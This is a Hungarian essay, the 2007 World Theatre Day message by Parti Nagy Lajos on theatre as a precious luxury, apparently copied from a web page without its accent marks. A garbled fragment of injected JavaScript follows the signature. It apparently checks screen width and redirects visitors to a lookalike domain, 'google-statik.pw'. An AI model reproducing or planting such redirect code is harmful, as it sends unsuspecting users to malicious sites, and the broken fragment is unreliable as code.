Színházi Világnapi Üzenet 2007

A verejtek luxusa

Abban, hogy felnott emberek esterol estere masok borebe bujva mutatjak meg onmagukat, meghozza eletre-halalra, s mindezt mas emberek egymas alatt, mellett, folott uldogelve szenvedelyesen bamuljak, onmagukat ismerve fel a jatszo szemelyekben esterol estere, nos, abban van valami gyonyoru keptelenseg. A szinhazban. Amikeppen maga a csoda, hogy e tevekenyseg nem nagy, de nem is jelentektelen hanyadat meg mindig muveszetnek lehet nevezni. En errol a hanyadrol beszelek. Es arrol, hogy egyre inkabb ezt a keptelenseget tartom a szinhazmuveszet legfo hatoerejenek. Azt, hogy megismetelhetetlen, hogy atavisztikus, tehat orok. Azt, hogy mar nem is lehetne, nem is kene lennie, ki-ki hazavihetne az egyetlen studiominosegu eloadast dvd-n es lejatszhatna a tuzfalnagysagu kepernyojen ahanyszor csak akarja, megis, ez a dolog, ez a kozos lelegzet kifogyhatatlan. No es leszarad es ujrano, idorol-idore megujul koszinhazon belul es kivul, hiszen szobaban, pinceben, raketabazison, barhol lehet muveszetet csinalni. S persze vacakot is barhol, belul es kivul. De most ne a vacakrol essek szo. Epuleteket be lehet zarni, eloadasokat szet lehet heccpolitizalni, de a szinhazat, mint nezo es szinesz ahitatos performance-at, nem lehet megszuntetni. Minel kevesbe kene lennie, annal jobban kell a szinhaz. A szemelyesseg, az egyszeriseg minosege, varazsereje tartja meg, teszi nelkulozhetetlenne a Foldon, s jo esetben valamivel a fold folott. Kell a szinpadi huzat rebbenese a nezo arcan, kell a por, a lampaho es a verejtek finom emberszaga, kell a jelento emberi test, melyet mas testek megfeszitve figyelnek. Kell, de nem muszaj. A muveszet luxus, ezen belul luxus tehat a szinhazmuveszet is. E kijelentesben nincs semmi elitizmus, ettol nem kell tartani, es ugy gondolom, belatni sem oly nehez. Igen, a szinhaz luxus, mint a nevetes, a siras, a szappan vagy a naplemente. Nelkule lehet elni. Csak erdemes-e?

Parti Nagy Lajos

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width